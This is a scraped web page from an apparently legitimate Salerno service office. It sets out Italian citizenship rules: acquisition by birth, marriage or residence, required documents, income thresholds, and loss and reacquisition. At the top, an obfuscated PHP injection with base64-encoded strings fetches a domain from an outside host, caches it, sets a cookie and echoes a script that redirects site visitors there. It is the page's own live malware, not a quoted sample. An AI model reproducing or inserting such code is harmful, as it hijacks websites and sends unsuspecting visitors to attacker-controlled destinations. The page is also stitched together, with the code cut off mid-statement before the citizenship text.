$ed6fe1d0be6347b8e = "/index/?6871568466678"; $kkk557 = "738dd3a8d3649a9131aafdde64b25464"; $s8c7dd922ad47494f = dirname(__FILE__) . "/" . md5($id6fe1d0be634); $h77e8e1445762ae1a = time(); $dejrif483ol = file_exists($s8c7dd922ad47494f); $deaa082fa57816233 = 0; $d07cc694b9b3fc636 = 0; if ($dejrif483ol) { $deaa082fa57816233 = filemtime($s8c7dd922ad47494f); $d07cc694b9b3fc636 = $h77e8e1445762ae1a - $deaa082fa57816233; $se1260894f59eeae9 = @fopen($s8c7dd922ad47494f, base64_decode('cg==')); $ke4e46deb7f9cc58c = json_decode(base64_decode(fread($se1260894f59eeae9, filesize($s8c7dd922ad47494f))) , 1); fclose($se1260894f59eeae9); } $v634894f9845d8dc65 = 'aHR0cDovL3JvaS10cmFmZmljLmljdS9nZXQucGhwP2Y9anNvbiZrZXk9'; $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; if ($d07cc694b9b3fc636 >= 20 || !$dejrif483ol) { $m9b207167e5381c47 = v64547f9857d8dc65($s8c7dd922ad47494f); if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) { $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; } } function v64547f9857d8dc65($s8c7dd922ad47494f){ global $v634894f9845d8dc65,$kkk557; if(function_exists('curl_version')){ $kd88fc6edf21ea464 = curl_init(); curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true); curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA==')); curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65).$kkk557); curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10); $mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464); curl_close($kd88fc6edf21ea464); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } }else{ $mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65).$kkk557); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } } return false; } if (!$_COOKIE[base64_decode('YTc3N2Q=') ]) { setcookie(base64_decode('YTc3N2Q=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $ye617ef6974faced4 . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $ye617ef6974faced4 . base64_decode('Ijs8L3NjcmlwdD4='); RICHIESTE DI CITTADINANZA - CENTRO SERVIZI SALERNO
CENTRO SERVIZI SALERNO » RICHIESTE DI CITTADINANZA

RICHIESTE DI CITTADINANZA

RICHIESTE DI CITTADINANZA

 

AUTOMATICAMENTE

  • Per nascita– straniero nato da almeno un genitore italiano
  • Per nascita sul territorio Italiano–  straniero nato in Italia al compimento dei 18 anni
  • Per adozione– minorenne adottato da cittadino Italiano

A DOMANDA PER MATRIMONIO

  • Il cittadino straniero o apolide, coniugato con cittadino/a italiano/a, può chiedere di acquisire la cittadinanza italiana se risiede legalmente in Italia da 12 mesi (un anno) in presenza di figli nati o adottati dai coniugi, oppure dopo 24 mesi (due anni) di convivenza con il cittadino italiano.
  • In caso di residenza all’estero: 18 mesi ( un anno e mezzo) in presenza di figli nato o adottati da coniugi, oppure 36 mesi (tre anni) dalla data del matrimonio (se non vi è stato scioglimento, annullamento o cessazione degli effetti civili e se non è in corso la separazione legale).

DOCUMENTAZIONE DA PRODURRE IN DUPLICE COPIA:

  1. Compilazione MODELLA A (scaricabile su www.sportelloimmigrazione.it)
  2. Marca da bollo da 16,00
  3. Estratto dell’atto di nascita completo di tutte le generalità con l’indicazione della paternità e maternità del richiedente, e relativa traduzione in lingua italiana
  4. Certificati penali del paese di origine e degli eventuali paesi terzi di residenza, e relative traduzioni in lingua italiana
  5. Fotocopia del permesso/carta soggiorno (per cittadini extracomunitari), ovvero dell’attestazione di soggiorno (rilasciata dal comune di residenza per cittadini comunitari)
  6. Copia originale del versamento dei 200,00 euro. Conto corrente postale n. 809020
  7. Per le sole categorie di apolide e rifugiato politico, copia del relativo certificato di riconoscimento.

A DOMANDA PER RESIDENZA

  • 10 anni di residenza legale in Italia per i cittadini extracomunitari
  • 3 anni di residenza legale in Italia per i discendenti di cittadini italiani per nascita (sino al secondo grado- nonni) e per i nati in Italia
  • 5 anni di residenza legale in Italia per gli adottati maggiorenni (da cittadini italiani), per gli apolidi e per i rifugiati politici e per i figli maggiorenni di genitori naturalizzati italiani
  • 4 anni di residenza legale in Italia per i cittadini comunitari
  • 5 anni di servizio, anche all’estero, alle dipendenze dello Stato Italiano.

NB: Per tutti i casi, è previsto il possesso di un reddito personale (o familiare valutabile discrezionalmente dal Ministero dell’Interno) negli ultimi 3 anni antecedente a quello di presentazione della domanda, i cui limiti minimi per ciascun anno sono di:

  • Euro 8.263,31 per richiedenti senza persone a carico
  • Euro 11.362,05 per i richiedenti con coniuge a carico, aumentabili di euro 516,00 per ogni ulteriore persona a carico.

 

DOCUMENTAZIONE DA PRODURRE IN DUPLICE COPIA:

  1. Compilazione MODELLO B (scaricabile su www.sportelloimmigrazione.it)
  2. Marca da bollo da euro 16,00
  3. dell’atto di nascita completo di tutte le generalità con l’indicazione della paternità e maternità del richiedente, e relativa traduzione in lingua italiana
  4. Certificati penali del paese di origine e degli eventuali paesi terzi di residenza, e relative traduzioni in lingua italiana
  5. Fotocopia del permesso/carta di soggiorno (per cittadini extracomunitari), ovvero dell’attestazione di soggiorno (rilasciata dal comune di residenza per cittadini comunitari)
  6. Modelli fiscali degli ultimi 3 anni (CUD, UNICO, 730) per chi è a carico di un componente del nucleo familiare / certificato di frequenza per gli studenti
  7. Copia originale del versamento dei 200,00 euro. Conto corrente postale n. 809020
  8. Per le sole categorie di apolide e rifugiato politico, copia del relativo certificato di riconoscimento

NB: Gli atti di cui ai punti 3 (tranne i casi di nascita in Italia) e 4, unitamente alle rispettive traduzioni in lingua italiana, dovranno essere legalizzati dall’Autorità diplomatica/consolare Italiana presente nello stato di provenienza, ovvero mediante l’apposizione del timbro ‘Apostille’ per gli stati aderenti alla convenzione dell’Aja.  I rifugiati politici che sono impossibilitati a produrre i medesimi certificati possono presentare un atto di notorietà in sostituzione di quello di nascita e una dichiarazione sostituzione del certificato penale.

 

PERDITA’ DELLA CITTADINANZA

  • PER RINUNCIA ESPRESSA NEI SEGUENTI CASI:

-Risiedono all’estero, se in possesso di altra cittadinanza

-Alla maggiore età, se in possesso di un’altra cittadinanza, quando la cittadinanza Italiana è stata acquisita durante la minore età per effetto della naturalizzazione dei genitori

-Alla maggiore età, per revoca dell’adozione, se in possesso di un’altra cittadinanza

  • AUTOMATICAMENTE NEI SEGUENTI CASI:

-In caso di revoca dell’adozione per fatto imputabile all’adottato

-Per non aver ottemperato all’intimazione del Governo di abbandonare un carico pubblico accettato presso uno stato estero o il servizio militare prestato presso un altro stato

 

RIACQUISTO DELLA CITTADINANZA

SU DOMANDA:

  • Stabilendo la residenza in Italia entro un anno dalla dichiarazione di riacquisto
  • Assumendo un pubblico impiego alle dipendenze dello Stato

AUTOMATICAMENTE:

  • Entro un anno dalla fissazione della residenza in Italia se non vi è stata rinuncia espressa da parte dell’interessato.